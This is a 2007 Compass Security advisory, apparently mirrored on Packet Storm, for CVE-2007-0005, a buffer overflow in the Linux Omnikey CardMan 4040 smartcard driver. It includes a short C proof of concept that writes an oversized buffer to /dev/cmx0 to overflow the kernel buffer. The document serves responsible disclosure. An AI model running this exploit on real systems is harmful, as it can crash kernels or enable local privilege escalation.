what you don't know can hurt you

csa-driver.txt

csa-driver.txt
Posted Mar 13, 2007
Authored by Daniel Roethlisberger | Site csnc.ch

COMPASS SECURITY ADVISORY - The Linux drivers for the Omnikey CardMan 4040 smartcard reader contains a buffer overflow vulnerability. Local attackers with direct or indirect write permissions to a cmx device file can execute arbitrary code with kernel privileges or may cause a denial of service condition. Proof of concept exploit included.

tags | exploit, denial of service, overflow, arbitrary, kernel, local, proof of concept
systems | linux
advisories | CVE-2007-0005
MD5 | 7dca159ebdcc3579a8aef062fa5d499b

csa-driver.txt

Change Mirror Download
#############################################################
#
# COMPASS SECURITY ADVISORY http://www.csnc.ch/
#
#############################################################
#
# Product: Linux Driver for Omnikey CardMan 4040
# Vendor: Omnikey GmbH / Harald Welte
# Subject: Buffer Overflow
# Risk: Medium
# Effect: Locally exploitable
# Author: Daniel Roethlisberger (daniel.roethlisberger@csnc.ch)
# Date: 2007-03-07
# CVE Name: CVE-2007-0005
#
#############################################################


Introduction:
-------------
The Linux drivers for the Omnikey CardMan 4040 smartcard reader contain
a buffer overflow vulnerability. Local attackers with direct or
indirect write permissions to a cmx device file can execute arbitrary
code with kernel privileges or may cause denial of service.


Vulnerable:
-----------
* Linux 2.4/2.6 cm4040 drivers by Omnikey:
- cm4040 v1.1.0
- cm4040 v1.2.0
- cm4040 v2.0.0
* Linux 2.6 cm4040 drivers by Harald Welte, as included in:
- Linux 2.6.15 ... 2.6.20.1

Not vulnerable:
---------------
* Linux 2.4/2.6 cm4040 drivers by Omnikey:
- cm4040 v1.0.0
* FreeBSD cmx driver by Daniel Roethlisberger

Not tested:
-----------
* Other Linux driver versions
* Drivers for MacOS X, Windows


Technical Description:
----------------------
While using the Linux drivers for the CM4040 as a reference for writing
a cmx FreeBSD driver, Compass Security has discovered two buffer
overflows in the Linux drivers. One of them in the write() and another
one in the read() handler.

When calling write() with a buffer larger than 512 bytes, the driver's
write buffer overflows, allowing to overwrite the EIP and execute
arbitrary code with kernel privileges.

In the read() handler, there is a similar problem with data originating
in the device. A malicious or buggy device sending more than 512 bytes
can overflow the driver's read buffer to the same effect.

Of course, the write() vulnerability is only exploitable by users with
direct or indirect write access to the cmx device special file. By
default, direct access is limited to root. Therefore, one might think
this is not an issue. However, unprivileged users may cause large
indirect writes via userland daemons such as those provided by pcsc-lite
or openct. Since "normal" APDUs are smaller than 512 bytes, this may
not be an issue, but I haven't looked into the various ways to cause
data to be written indirectly.

Furthermore, a system can be set up to allow access to the device for a
special user or group in order to increase security by running the
userland drivers without root privileges. In such a setup users with
access to the device can escalate privileges or cause DoS.


PoC Code:
---------
/*
* Linux Omnikey Cardman 4040 driver buffer overflow (CVE-2007-0005)
* Copyright (C) Daniel Roethlisberger <daniel.roethlisberger@csnc.ch>
* Compass Security Network Computing AG, Rapperswil, Switzerland.
* All rights reserved.
* http://www.csnc.ch/
*/

#include<sys/stat.h>
#include<fcntl.h>
#include<unistd.h>
#include<stdlib.h>
#include<stdio.h>
#include<string.h>
#include<errno.h>

int main(int argc, char *argv[]) {
int fd, i, n;
char buf[8192];

/*
* 0 1 2 3 4 5 6 7 8 9 a b c d e f ...
* 00 01 00 02 00 03 00 04 00 05 00 06 00 07 00 08 ...
*/
for (i = 0; i < sizeof(buf); i += 2) {
buf[i] = (char)(((i/2) & 0xFF00) >> 8);
buf[i+1] = (char) ((i/2) & 0x00FF);
}

if ((fd = open("/dev/cmx0", O_RDWR)) < 0) {
printf("Error: open() => %s\n", strerror(errno));
exit(errno);
}
if ((n = write(fd, buf, sizeof(buf))) < 0) {
printf("Error: write() => %s\n", strerror(errno));
exit(errno);
}
printf("%d of %d bytes written\n", n, sizeof(buf));
exit(0);
}


Workaround:
-----------
Patch available: http://lkml.org/lkml/2007/3/6/386


Timeline:
---------
Vendor Status: Linux 2.6.21-rc3 contains the patch.
Omnikey will fix it in their next driver release.
Vendor Notified: 2007-02-05 (Harald Welte)
2007-02-06 (vendor-sec, Omnikey)
Vendor Response: Will fix (Harald Welte, vendor-sec)
Will fix but not coordinate release schedule (Omnikey)
Embargo Until: 2007-03-06


--
Daniel Roethlisberger, Compass Security Network Computing AG
Glaernischstrasse 7, CH-8640 Rapperswil, Switzerland

Tel +41 55 214 41 77
Fax +41 55 214 41 61
daniel.roethlisberger@csnc.ch
http://www.csnc.ch/

PGP: D927 96F6 7266 1683 06CF F984 ACEC DBB0 6929 2CBA
Security Review - Penetration Testing - Computer Forensics

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

September 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    1 Files
  • 2
    Sep 2nd
    38 Files
  • 3
    Sep 3rd
    30 Files
  • 4
    Sep 4th
    15 Files
  • 5
    Sep 5th
    12 Files
  • 6
    Sep 6th
    17 Files
  • 7
    Sep 7th
    3 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    24 Files
  • 10
    Sep 10th
    22 Files
  • 11
    Sep 11th
    22 Files
  • 12
    Sep 12th
    15 Files
  • 13
    Sep 13th
    5 Files
  • 14
    Sep 14th
    2 Files
  • 15
    Sep 15th
    1 Files
  • 16
    Sep 16th
    11 Files
  • 17
    Sep 17th
    14 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close